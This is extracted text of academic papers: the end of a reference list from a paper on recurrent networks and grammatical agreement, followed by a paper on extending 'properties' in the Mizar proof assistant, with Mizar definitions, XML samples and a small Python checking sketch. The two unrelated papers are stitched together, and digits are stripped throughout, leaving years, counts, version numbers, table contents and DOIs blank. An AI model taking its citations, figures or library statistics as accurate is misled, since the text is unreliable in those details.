in proceedings of the nips workshop on cog- nitive computation: integrating neural and symbolic approaches. bo cartling. . on the implicit acquisition of a context-free grammar by a simple recurrent neural net- work. neurocomputing, ( ): – . rich caruana. . multitask learning. in sebastian thrun and lorien pratt, editors, learning to learn, pages – . boston: kluwer. ciprian chelba, tomas mikolov, mike schuster, qi ge, thorsten brants, phillipp koehn, and tony robin- son. . one billion word benchmark for measur- ing progress in statistical language modeling. arxiv preprint arxiv: . . kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase repre- sentations using rnn encoder–decoder for statistical machine translation. in proceedings of emnlp, pages – . noam chomsky. . aspects of the theory of syntax. cambridge, ma: mit press. alexander clark, gianluca giorgolo, and shalom lap- pin. . statistical representation of grammaticality judgements: the limits of n-gram models. in proceed- ings of the fourth annual workshop on cognitive mod- eling and computational linguistics (cmcl), pages – . chris dyer, adhiguna kuncoro, miguel ballesteros, and a. noah smith. . recurrent neural network gram- mars. in proceedings of naacl/hlt, pages – . kathleen m. eberhard, j. cooper cutting, and kathryn bock. . making syntax of sense: number agree- ment in sentence production. psychological review, ( ): – . jeffrey l. elman. . finding structure in time. cogni- tive science, ( ): – . jeffrey l. elman. . distributed representations, sim- ple recurrent networks, and grammatical structure. ma- chine learning, ( - ): – . jeffrey l. elman. . learning and development in neu- ral networks: the importance of starting small. cogni- tion, ( ): – . martin b. h. everaert, marinus a. c. huybregts, noam chomsky, robert c. berwick, and johan j. bolhuis. . structures, not strings: linguistics as part of the cognitive sciences. trends in cognitive sciences, ( ): – . robert frank, donald mathis, and william badecker. . the acquisition of anaphora by simple recur- rent networks. language acquisition, ( ): – . felix gers and jürgen schmidhuber. . lstm re- current networks learn simple context-free and context- sensitive languages. ieee transactions on neural net- works, ( ): – . anastasia giannakidou. . negative and positive polarity items: variation, licensing, and compositional- ity. in claudia maienborn, klaus von heusinger, and paul portner, editors, semantics: an international hand- book of natural language meaning. berlin: mouton de gruyter. yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of coling , pages – . edward grefenstette, karl moritz hermann, mustafa su- leyman, and phil blunsom. . learning to trans- duce with unbounded memory. in advances in neural information processing systems, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . rodney huddleston and geoffrey k. pullum. . the cambridge grammar of the english language. cam- bridge university press, cambridge. armand joulin and tomas mikolov. . inferring algorithmic patterns with stack-augmented recurrent nets. in advances in neural information processing systems, pages – . rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. arxiv preprint arxiv: . . ákos kádár, grzegorz chrupała, and afra alishahi. . 
representation of linguistic form and func- tion in recurrent neural networks. arxiv preprint arxiv: . . andrej karpathy, justin johnson, and fei-fei li. . visualizing and understanding recurrent networks. in iclr workshop. diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in international confer- ence for learning representations. eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing using bidirectional lstm feature representations. transactions of the asso- ciation of computational linguistics, : – . jey han lau, alexander clark, and shalom lappin. . unsupervised prediction of acceptability judgements. in proceedings of acl/ijcnlp, pages – . steve lawrence, lee c. giles, and santliway fong. . can recurrent neural networks learn natural language grammars? in ieee international conference on neu- ral networks, volume , pages – . willem j. m. levelt, ardi roelofs, and antje s. meyer. . a theory of lexical access in speech production. behavioral and brain sciences, ( ): – . jiwei li, xinlei chen, eduard h. hovy, and dan jurafsky. . visualizing and understanding neural models in nlp. in proceedings of naacl-hlt , pages – . franc marušič, andrew nevins, and amanda saksida. . last-conjunct agreement in slovenian. in an- nual workshop on formal approaches to slavic lin- guistics, pages – . tomas mikolov, martin karafiát, lukas burget, jan cer- nockỳ, and sanjeev khudanpur. . recurrent neu- ral network based language model. in interspeech, pages – . janet l. nicol, kenneth i. forster, and csaba veres. . subject–verb agreement processes in comprehension. journal of memory and language, ( ): – . joakim nivre, laura rimell, ryan mcdonald, and carlos gomez-rodriguez. . evaluation of dependency parsers on unbounded dependencies. in proceedings of the rd international conference on computational linguistics, pages – . association for computa- tional linguistics. laura rimell, stephen clark, and mark steedman. . unbounded dependency recovery for parser evaluation. in proceedings of emnlp, pages – . paul rodriguez, janet wiles, and jeffrey l. elman. . a recurrent neural network that learns to count. con- nection science, ( ): – . paul rodriguez. . simple recurrent networks learn context-free and context-sensitive languages by count- ing. neural computation, ( ): – . douglas l. t. rohde and david c. plaut. . language acquisition in the absence of explicit negative evidence: how important is starting small? cognition, ( ): – . john robert ross. . constraints on variables in syntax. ph.d. thesis, mit. carson t. schütze. . the empirical base of linguis- tics: grammaticality judgments and linguistic method- ology. chicago, il: university of chicago press. richard socher. . recursive deep learning for natural language processing and computer vision. ph.d. thesis, stanford university. adrian staub. . on the interpretation of the number attraction effect: response time evidence. journal of memory and language, ( ): – . martin sundermeyer, ralf schlüter, and hermann ney. . lstm neural networks for language modeling. in interspeech. darren tanner, janet nicol, and laurel brehm. . the time-course of feature interference in agreement com- prehension: multiple mechanisms and asymmetrical attraction. journal of memory and language, : – . oriol vinyals, Łukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey hinton. . grammar as a foreign language. in advances in neural information processing systems, pages – . arnold zwicky. . 
agreement with nearest always bad? http://itre.cis.upenn.edu/~myl/languagelog/archives/ .html.

figure : activation plots for all units (see figure a).
submitted june accepted october published november corresponding author artur korniłowicz, arturk@math.uwb.edu.pl academic editor marieke huisman additional information and declarations can be found on page doi . /peerj-cs. copyright korniłowicz distributed under creative commons cc-by . open access enhancement of properties in mizar artur korniłowicz institute of computer science, university of bialystok, bialystok, poland abstract a ‘‘property’’ in the mizar proof-assistant is a construction that can be used to register chosen features of predicates (e.g., ‘‘reflexivity’’, ‘‘symmetry’’), operations (e.g., ‘‘involutiveness’’, ‘‘commutativity’’) and types (e.g., ‘‘sethoodness’’) declared at the definition stage. the current implementation of mizar allows using properties for notions with a specific number of visible arguments (e.g., reflexivity for a predicate with two visible arguments and involutiveness for an operation with just one visible argument). in this paper we investigate a more general approach to overcome these limitations. we propose an extension of the mizar language and a corresponding enhancement of the mizar proof-checker which allow declaring properties of notions of arbitrary arity with respect to explicitly indicated arguments. moreover, we introduce a new property—the ‘‘fixedpoint-free’’ property of unary operations—meaning that the result of applying the operation to its argument always differs from the argument. results of tests conducted on the mizar mathematical library are presented. subjects digital libraries, theory and formal methods, programming languages keywords formal verification, mizar proof-assistant, mizar mathematical library introduction classical mathematical papers consist of sequences of definitions and justified facts classified into several categories like: theorems, lemmas, corollaries, and so on, often interspersed with some examples and descriptions. mathematical documents prepared using various proof-assistants (e.g., isabelle (isabelle, ), hol light (hol light, ), coq (coq, ), metamath (metamath, ), lean (lean, ), and mizar (mizar, )) can also contain other constructions that are processable by dedicated software. in the case of the mizar system (bancerek et al., ; grabowski, korniłowicz & naumowicz, ) such constructions are: . existential, conditional and functorial registrations which enhance processing adjectives (naumowicz, ), . term reductions which reduce terms to their proper sub-terms (korniłowicz, ), . term identifications which identify equivalent notions from different theo- ries (grabowski, korniłowicz & naumowicz, ), and . properties which can declare chosen properties of predicates, functors and types at the stage of their definitions (naumowicz & byliński, ). the current implementation of the mizar proof-assistant allows using properties for notions with a specific number of visible arguments. visible arguments are those which are explicitly used in the notation of the notion. for example, if x and y are elements of how to cite this article korniłowicz a. . enhancement of properties in mizar. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:arturk@math.uwb.edu.pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. 
a group g, then for the operation x+y, where + denotes the addition of elements of the group g, x and y are visible arguments, while g is a hidden argument of the operation. in this paper we propose an extension of both the mizar language and the mizar proof- checker which allows declaring properties of notions of arbitrary arity with respect to explicitly indicated arguments. we also introduce a new property—the ‘‘fixedpoint-free’’ property of unary operations. it states that the result of applying the operation to its argument always differs from the argument. the structure of the paper is the following: in ‘mizar proof-assistant’ we present the mizar proof-assistant with the focus on its features related to the new development proposed in this paper; in ‘properties’ we describe how to define and use properties for arbitrary arguments; in ‘fixedpoint-free property’ we present the ‘‘fixedpoint-free’’ property; and finally, in ‘conclusions and future work’, we describe some conclusions and plans for next enhancements of properties in mizar. the results of implementing new features in the mizar mathematical library (mml) (bancerek et al., ; alama et al., ) are shown in both ‘properties’ and ‘fixedpoint-free property’. mizar proof-assistant the mizar project started in under the leadership of andrzej trybulec (matuszewski & rudnicki, ; grabowski, korniłowicz & naumowicz, ). the main goal of the project is to develop a computer framework that allows writing mathematical papers under the control of computer programs that check syntactical, semantical and logical correctness of texts. the mizar project consists of three main components: • a language invented to write mathematical texts to be processed by computers, • a collection of computer programs designed and implemented for processing texts written in the mizar language, with its core program, a proof-checker named verifier, suitable for formal verification (avigad & harrison, ; trybulec et al., ; wiedijk , ), and • the mizar mathematical library—a library of documents (called articles) written in the mizar language and verified by the mizar proof-checker. language the mizar language reflects the natural language of mathematics and enables computers to efficiently process documents written in the language. it implements rules for writing: formulae of various kinds, definitions, theorems, local lemmas, reasoning methods, proof steps, and other syntactic constructions instructing the proof-checker to launch dedicated algorithms for processing particular mechanisms (e.g., term identifications (grabowski, korniłowicz & naumowicz, ), term reductions (korniłowicz, ), properties of predicates and functors (naumowicz & byliński, )), etc. for the purposes of this paper we recall some basic information about how new mathematical notions can be defined in mizar articles. the mizar language allows users to define predicates, functors (linguistic functions used to define operations), attributes (naumowicz, ), types (bancerek, ), and korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. structures. the general form of a definition consists of the definition arguments, permissive assumptions (necessary to prove the correctness of the definition), its notation (prefix, infix or suffix), the result type, the definiens, correctness conditions, and some extra properties. 
for example, the union of two sets can be defined as follows: definition let x,y be set; func x \/ y -> set means :: xboole_ :def for x being object holds x in it iff x in x or x in y; existence; uniqueness; commutativity; idempotence; end; where the statement let x,y be set; introduces two arguments, func declares that it is a definition of an operation, x \/ y introduces the symbol \/ for the union and declares it to be used as an infix symbol, → set defines the type of the result of the operation (the union of two sets is a set), xboole_ :def is a unique identifier of the definition (it can be used to refer to the definition), for statement describes the meaning of the definition (it keyword in the definiens represents the notion being defined), existence is an automatically generated statement that has to be proved by authors to justify that there exists an object satisfying the definiens, uniqueness is another automatically generated statement that has to be proved to justify that there exists only one object satisfying the definiens, commutativity and idempotence are extra properties that can be declared and proved about the notion at this stage. one can observe that in the above example definition there are no permissive assumptions, because they are not necessary to justify the existence and uniqueness. but, for example, in the definition of a homeomorphism between two topological structures: definition let s,t be topstruct; assume s,t are_homeomorphic; mode homeomorphism of s,t -> function of s,t means :: topgrp_ :def it is being_homeomorphism; existence; end; such an assumption assume s,t are_homeomorphic; is necessary to justify the existence, because in general not all topological spaces are homeomorphic. the mizar language allows also introducing, so called, redefinitions. redefinitions can be used for the following purposes: • to change result types of operations for more specific types of arguments; for example, addition of numbers can be defined for complex numbers with the result type korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. representing complex numbers, but when arguments of the definition are, say, natural numbers, the result type of the addition can be redefined to the type representing natural numbers; • to reformulate definiens formulae in domain languages adequate to the types of arguments of the notion; for example, the inclusion of arbitrary sets can be defined in terms of elements of the sets, while when arguments of the inclusion are binary relations, the definiens of the inclusion can be formulated in terms of pairs of elements. proof checker the logical foundation of the mizar checker is classical first-order logic with equality (in some contexts, however, free second-order variables are permitted enabling the introduction of schemes, e.g., the scheme of mathematical induction). the proof system is based on the jaśkowski style of natural deduction (jaśkowski, ). structures of proofs are basically related to the structures of the formulae being proved with application of definitional expansions. from the author’s perspective, the correctness of formalized reasoning is controlled by the core utility of the mizar system, the verifier. although its proof-checking code is sufficient to guarantee logical correctness, there are successful applications of external software to perform some particular tasks during processing mizar texts (naumowicz, ; naumowicz, ; naumowicz, ). 
verifier is a classical proof checker based on the notion of the inference obviousness (davis, ; rudnicki, ). the basic modules of verifier are the following: parser which is responsible for controlling the lexical structure of a given text and generating the parse tree of the text. msm processor which identifies constants, variables and labels. analyzer which identifies objects and operations, performs type checking and resolves possible ambiguities caused by overloading of symbols. moreover, it verifies if constraints required by particular constructions are fulfilled. reasoner which controls structures of proofs according to the natural deduction rules. checker which verifies logical correctness of inferences. as a disprover it tries to refute negations of processed sentences. it performs propositional calculus (prechecker), equational calculus over equalities accessible in inferences (equalizer) and unification (unifier). mizar mathematical library the mizar mathematical library (mml) (bancerek et al., ; alama et al., ) was established in to accumulate mathematical knowledge formalized and verified using the mizar proof-assistant. it is a collection of papers based on the tarski-grothendieck (tg) set theory, which is a variant of the zfc set theory (hayden et al., ), where the axiom of infinity is replaced by tarski’s axiom of existence of arbitrarily large, strongly inaccessible cardinals (tarski, ). korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the current version . . of the mizar mathematical library contains articles ( , , bytes in total) devoted to various branches of mathematics. developing the mml includes the following tasks: • collecting new knowledge realized by: (a) developing background knowledge to prepare a comprehensive database for practicing mathematicians and for educational purposes; (b) formalizing entire mathematical books (gierz et al., ; bancerek & rudnicki, ); (c) formalizing well-known theorems (abad & abad, ); and (d) developing new theories (grabowski, ; grabowski, ; grabowski & jastrzebska, ). • refactoring the database (grabowski & schwarzweller, ) to keep its integrity (rud- nicki & trybulec, ) and to increase readability of the stored proofs (pąk, ). knowledge stored in the database is used in various branches of science and education, e.g., for representing mathematics on www (iancu et al., ; urban, ), as an input for atp systems (urban, rudnicki & sutcliffe, ; urban & sutcliffe, ; urban, hoder & voronkov, ; urban, ), as an input for services classifying mathematics (grabowski & schwarzweller, ), and others. processing mizar articles every mizar article written as a plain text file with the file extension .miz consists of two main parts: its environment, which can be seen as the import part from the mizar mathematical library, and text-proper part, where new definitions, lemmas, theorems etc. are placed. in the environment part the following directives are allowed: • vocabularies –imports symbols of notions stored in the mml. • notations –imports notations of notions stored in the mml. the order is important –in the case of overloading the last one counts. • constructors –imports constructors (meanings) of notions. • theorems –imports theorems to which proofs refer to. • schemes –imports schemes to which proofs refer to. • definitions –imports formulae that determine proof skeletons. • registrations –imports registrations, term identifications and term reductions used in proofs. 
• equalities –imports equalities of operations defined using equals clause with their meanings. • expansions –imports expansions of predicates and adjectives. • requirements –imports switches to launch build-in procedures by the checker. the environment is processed by a dedicated program—accommodator. it reads the environment part of the article and prepares global notions ready to be used in the local article. when it is done, verifier processes the text-proper part of the article. firstly, parser scans the article, checks its grammatical correctness and prepares the parse tree of the article. the parse tree is stored in the xml file with the extension .wsx (naumowicz & piliszek, ). the next submodule, msm processor, reads the .wsx file and identifies korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. all identifiers of constants, variables and labels that appear in the article. msm processor adds computed information to data written in the .wsx file and creates another xml file with the extension .msx. then, analyzer reads the .msx file and resolves ambiguities and identifies used notions (predicates, adjectives, types, operations and structures). analyzer creates another xml file with the extension .xml—the structure of this .xml file differs from structures of both .wsx and .msx files. the .xml file contains the complete semantic information about all constructions used in the processed article. when all ambiguities are resolved and all notions are identified, the article is ready to be verified against its logical correctness by the mizar checker. formulae are negated, transformed to their disjunctive normal forms and all disjuncts, one by one, are then verified by equalizer—a mizar module dealing with equational calculus (rudnicki & trybulec, ). it collects all terms from the processed disjunct, and computes the congruence closure over equalities available in the inference. the equalities can be provided by various mizar constructions, like: term expansions (equals), properties of operations, term reductions, term identifications, arithmetic, type changing (reconsider), and others, e.g., processing structures. for the sake of this paper let us underline properties of operations. they are described in more detail in ‘properties’. the last procedure applied to the processed inference is its unification. if equalizer cannot disprove the formula, unifier starts working and tries to refute it. if unifier finds a contradiction, the original disjunct is accepted as true; otherwise, appropriate messages are reported and authors are supposed to complete missing proofs. when all formulae are accepted, the article can be submitted to the mizar mathematical library and the new knowledge can be used in subsequent works. two other tools are used to export the new article into the database: exporter—extracts public knowledge from the article, and transferer—transfers the knowledge into the mizar mathematical library. properties properties in mizar are constructions which can be used to declare that predicates are reflexive (∀x :xrx), irreflexive (∀x :¬xrx), symmetric (∀x,y :xry →yrx), asymmetric (∀x,y :xry →¬yrx), and connected (∀x,y :xry∨yrx); in the case of operations, they can be declared as involutive (f (f (x))=x), projective (f (f (x))= f (x)), idempotent (f (x,x)=x), and commutative (f (x,y)= f (y,x)). such declarations of chosen properties must be placed within definitional blocks. 
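to make the semantics of these declarations concrete, the following is an illustrative python sketch (this is not how the mizar checker is implemented) that brute-force checks the corresponding formulae over a small finite domain:

from itertools import product

def is_reflexive(domain, r):      # forall x: x r x
    return all(r(x, x) for x in domain)

def is_symmetric(domain, r):      # forall x, y: x r y implies y r x
    return all((not r(x, y)) or r(y, x) for x, y in product(domain, repeat=2))

def is_involutive(domain, f):     # f(f(x)) = x
    return all(f(f(x)) == x for x in domain)

def is_projective(domain, f):     # f(f(x)) = f(x)
    return all(f(f(x)) == f(x) for x in domain)

def is_commutative(domain, f):    # f(x, y) = f(y, x)
    return all(f(x, y) == f(y, x) for x, y in product(domain, repeat=2))

def is_idempotent(domain, f):     # f(x, x) = x
    return all(f(x, x) == x for x in domain)

# example: on the subsets of {1, 2}, binary union is commutative and idempotent
# (mirroring the declarations in the definition of x \/ y quoted earlier),
# set inclusion is reflexive, and complementation is involutive
subsets = [frozenset(s) for s in [(), (1,), (2,), (1, 2)]]
universe = frozenset({1, 2})
assert is_commutative(subsets, lambda a, b: a | b)
assert is_idempotent(subsets, lambda a, b: a | b)
assert is_reflexive(subsets, lambda a, b: a <= b)
assert is_involutive(subsets, lambda a: universe - a)

in the mizar checker itself such declarations are not verified by enumeration over a domain; they are proved once at definition time and then, as described next, make the corresponding formulae obvious in later inferences.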
when a notion is equipped with some properties, then adequate formulae involving the notion become obvious to the mizar checker without any explicit reference to the definition and any theorem (they are processed automatically based on internally generated equalities of terms in cases of properties of functors and appropriate formulae in cases of properties of predicates). for example, the declaration of the idempotence of the binary union of sets implies that the equality a∪a=a becomes obvious for any set a. the current implementation of the mizar checker is restricted to fixed numbers of visible arguments of considered notions listed in table . in this work we propose an extension of the mizar system with the possibility of explicit indication with respect to which visible arguments of mathematical notions given properties korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table arities of properties of notions. predicates functors property name arity property name arity reflexivity projectivity irreflexivity involutiveness symmetry commutativity asymmetry idempotence connectedness can be declared. to achieve this, one can use the wrt clause followed by a comma separated list_of_loci of visible arguments of lengths presented in table . the extended syntax of a definition of a functor is the following: definition let x be θ , x be θ , ..., xn be θn; func ⊗(x ,x ,...,xn) -> θ means :ident: (x ,x ,...,xn,it); correctness; property_name wrt list_of_loci justification; end; and the extended syntax of a definition of a predicate is the following: definition let x be θ , x be θ , ..., xn be θn; pred π(x ,x ,...,xn) means :ident: (x ,x ,...,xn); property_name wrt list_of_loci justification; end; for the back compatibility the wrt clause is not obligatory, definitions with no wrt clause work as in previous releases of the mizar checker. examples as an example of using this new feature in the mml we can cite the theorem (kusak & radziszewski, ): theorem th : sum(a,b,o) = sum(b,a,o); which can be reformulated as commutativity of: definition let sas be semi_affine_space; let a,b,o be element of sas; func sum(a,b,o) -> element of sas means :def : congr o,a,b,it; correctness by th ,th ; commutativity wrt a,b by th ; korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. end; an interesting example of a theorem which at the first glance looks like symmetry of some quaternary predicate with respect to the third and forth argument, but cannot be reformulated as symmetry of the predicate, is oryszczyszyn & prazmowski ( ): theorem th : p,q _|_ p ,q implies p,q _|_ q ,p ; to explain this fact one should look at types of variables p, q, p , and q used in the theorem and types of arguments of the definition of the predicate _|_. the type of p, q, p , and q is reserve v for reallinearspace; reserve w,y for vector of v; reserve p,p ,q,q for element of amspace(v,w,y); while the predicate _|_ is defined as: definition let pos be ortstr; let a,b,c,d be element of pos; pred a,b _|_ c,d means :: analmetr:def [[a,b],[c,d]] in the orthogonality of pos; end; now it is clear that types of variables p, q, p , and q are more restricted than original types of arguments a, b, c, and d of the predicate declared in its definition. the statement proved as the mentioned theorem th is true for elements of a particular space amspace(v,w,y), but does not hold for elements of an arbitrary space ortstr. 
it is a very typical case, when some notion is defined for general types of arguments, and its particular properties are provable for less general ones. changes in xml files as it was said in ‘processing mizar articles’, the mizar verifier, to check the correctness of mizar articles, generates and processes several intermediate files written in xml formats. to be able to implement the feature considered in this section, we had to slightly change the grammars of these xml files. from the perspective of mizar users formalizing some knowledge, these changes are not important—the authors are not supposed to look into these files. for researchers who use the mizar system for other purposes and develop external applications working on the semantic level of the mizar mathematical library (urban, ), these changes will induce the need for some adjustments or reimplementations. therefore, below we explain the changes. let us take the following definition: definition let e be set; let a,b be element of e; korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. func +(a,b,e) -> element of e equals a \/ b; coherence; commutativity wrt a,b; end; as a working example. in the file .wsx (naumowicz & piliszek, ) we added a new xml element propertyloci including a list of loci for which the property holds. for our example it looks like this: <item kind="property" property="commutativity" line=" " col=" " posline=" " poscol=" "> <propertyloci> <locus idnr=" " spelling="a" line=" " col=" "/> <locus idnr=" " spelling="b" line=" " col=" "/> </propertyloci> <straightforward-justification line=" " col=" "/> </item> this is propagated to the .msx file, which is an extension of the .wsx file, and for our example it becomes: <item kind="property" property="commutativity" line=" " col=" " posline=" " poscol=" "> <propertyloci> <locus idnr=" " spelling="a" line=" " col=" " origin="constant" kind="constant" serialnr=" " varnr=" "/> <locus idnr=" " spelling="b" line=" " col=" " origin="constant" kind="constant" serialnr=" " varnr=" "/> </propertyloci> <straightforward-justification line=" " col=" "/> </item> next two changes are introduced in .xml files: we added internal descriptions of properties in their definitions: <justifiedproperty> <commutativity> <propertyloci> <int x=" "/> <int x=" "/> </propertyloci> </commutativity> and in constructors with which properties are associated: <constructor kind="k" nr=" " aid="ee" relnr=" "> korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. <properties> <commutativity propertyarg =" " propertyarg =" "/> </properties> fixedpoint-free property as another enhancement of properties in mizar we propose a new unary property of functors—‘‘fixedpoint-free’’. the fixedpoint-free property is meaningful for operations of which the result of application to a given argument is always different from the argument. this is reflected in justification formulae of the properties to be proved at the stage of defining the operation. we propose the following syntax and formulae to be proved to justify the correctness of the property for given functors. 
in the case of functors defined using the means clause with a simple definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ means :ident: (x ,x ,...,xn,it); existence; uniqueness; fixedpoint-free proof thus for r being θn+ , x being θn st (x ,x ,...,xn− ,x,r) holds r <> x; end; end; using the means clause with a complex definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ means :ident: (x ,x ,...,xn,it) if (x ,x ,...,xn), (x ,x ,...,xn,it) if (x ,x ,...,xn), (x ,x ,...,xn,it) if (x ,x ,...,xn) otherwise n(x ,x ,...,xn,it); existence; uniqueness; consistency; fixedpoint-free proof thus for r being θn+ , x being θn st ( (x ,x ,...,xn) implies (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies (x ,x ,...,xn− ,x,r)) & (not (x ,x ,...,xn) & not (x ,x ,...,xn) & korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. not (x ,x ,...,xn) implies n(x ,x ,...,xn− ,x,r)) holds r <> x; end; end; and similarly in the case of functors defined using the equals clause with a simple definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ equals :ident: τ(x ,x ,...,xn); coherence; fixedpoint-free proof thus for r being θn+ , x being θn st r = τ(x ,x ,...,xn− ,x) holds r <> x; end; end; and using the equals clause with a complex definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ equals :ident: τ (x ,x ,...,xn) if (x ,x ,...,xn), τ (x ,x ,...,xn) if (x ,x ,...,xn), τ (x ,x ,...,xn) if (x ,x ,...,xn) otherwise τn(x ,x ,...,xn); coherence; consistency; fixedpoint-free proof thus for r being θn+ , x being θn st ( (x ,x ,...,xn) implies r = τ (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies r = τ (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies r = τ (x ,x ,...,xn− ,x,r)) & (not (x ,x ,...,xn) & not (x ,x ,...,xn) & not (x ,x ,...,xn) implies r = τn(x ,x ,...,xn− ,x,r)) holds r <> x; end; end; this property can also be declared with the wrt clause as described in ‘properties’, and could be added to table . an important part of our work was implementing a tool (fixedpointfreedetector) which detects mml theorems that could be rewritten as fixedpoint-free properties of operations used in formulations of the theorems. to detect such theorems, the following steps should be done: korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . if the theorem is a conjunction of some atomic formulae, decomposing a given formula to a list of atomic formulae. . selecting inequalities among the atomic formulae. . selecting formulae which compare unary terms with single variables among the inequalities. . for each such a formula checking whether: (a) the argument of the unary term equals to a single variable, (b) the type of the variable and the type of the argument of the term declared in the definition of the operation are equal. . if both answers to the above questions ( a) and ( b) are positive, marking the fact to be replaceable by the fixedpoint-free property of the operation. at the end of this section we present results of launching the detector on the mizar mathematical library. in the current version of the library such theorems were found in articles. they are: the power set of a set, the successor of a set, and poles at infinity of elements of the absolute. 
changing the theorems to the properties caused that inferences in the mizar mathematical library became obvious. even though these numbers obtained in tests are not too big, the library committee of the mizar project will analyze the cases and will decide about incorporating them into the library. in the case of approval, a refactoring (grabowski & schwarzweller, ) of the mml will be processed. computations were carried out at the computer center of university of białystok http://uco.uwb.edu.pl. conclusions and future work although the basic concept of properties had been introduced to quite early releases of the mizar system, we still see possibilities to design and develop new features of properties in mizar. in this paper we described two new features: (a) we presented the syntax and semantics of a new property (fixedpoint-free) which enriches the mizar language and increases the computational power of the mizar checker by a more automatic processing of unary operations with no fixed points, and (b) we removed a restriction on the application of already defined properties for fixed positions of visible arguments. investigating a more general approach to introducing properties resulted in an extension of the mizar language and a corresponding enhancement of the mizar proof-checker. to analyze the potential usefulness of the proposed general approach we implemented a dedicated software tool and conducted appropriate tests with it on the current mizar mathematical library. as future work, we plan to open the system of properties for arbitrary (when possible) arities of predicates and functors. we already see within the current content of the mizar mathematical library several applications of that approach, e.g., we would be able to define commutativity for enumerated sets with cardinality greater than two, reflexivity and symmetry of the relation of lying more than two points on a given line, and others. we korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://uco.uwb.edu.pl http://dx.doi.org/ . /peerj-cs. also plan to investigate new sorts of properties, like associativity or being one-to-one of functors. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • artur korniłowicz conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: binary files of the programs and mizar library required for testing are available at: artur korniłowicz. ( , november ). fixedpoint-free property processor. zenodo. http://doi.org/ . /zenodo. . references abad p, abad j. . the hundred greatest theorems. available at https://www.cs.ru.nl/ f.wiedijk/mizar/mizman.pdf . alama j, kohlhase m, mamane l, naumowicz a, rudnicki p, urban j. . licensing the mizar mathematical library. in: davenport jh, farmer wm, urban j, rabe f, eds. proceedings of the th calculemus and th international conference on intelligent computer mathematics. volume of mkm’ , lecture notes in computer science. berlin: springer-verlag, – doi . / - - - - _ . avigad j, harrison j. . formally verified mathematics. communications of the acm ( ): – doi . / . bancerek g. . on the structure of mizar types. in: geuvers h, kamareddine f, eds. 
electronic notes in theoretical computer science. vol. . netherlands: elsevier, – . bancerek g, byliński c, grabowski a, korniłowicz a, matuszewski r, naumow- icz a, pąk k. . the role of the mizar mathematical library for interac- tive proof development in mizar. journal of automated reasoning ( ): – doi . /s - - - . bancerek g, byliński c, grabowski a, korniłowicz a, matuszewski r, naumowicz a, pąk k, urban j. . mizar: state-of-the-art and beyond. in: kerber m, carette j, kaliszyk c, rabe f, sorge v, eds. intelligent computer mathematics –international conference, cicm , washington, dc, usa, july ( ) – , proceedings. korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. https://www.cs.ru.nl/f.wiedijk/mizar/mizman.pdf https://www.cs.ru.nl/f.wiedijk/mizar/mizman.pdf http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . bancerek g, rudnicki p. . a compendium of continuous lattices in mizar: for- malizing recent mathematics. journal of automated reasoning ( – ): – doi . /a: . coq. . coq. available at https://coq.inria.fr/ . davis m. . obvious logical inferences. in: proceedings of the seventh international joint conference on artificial intelligence. – . gierz g, hofmann k, keimel k, lawson j, mislove m, scott d. . a compendium of continuous lattices. berlin: springer-verlag. grabowski a. . automated discovery of properties of rough sets. fundamenta informaticae ( – ): – doi . /fi- - . grabowski a. . efficient rough set theory merging. fundamenta informaticae ( ): – doi . /fi- - . grabowski a, jastrzębska m. . a note on a formal approach to rough operators. in: szczuka ms, kryszkiewicz m, ramanna s, jensen r, hu q, eds. rough sets and current trends in computing – th international conference, rsctc , warsaw, poland, june ( ) - . proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . grabowski a, korniłowicz a, naumowicz a. . mizar in a 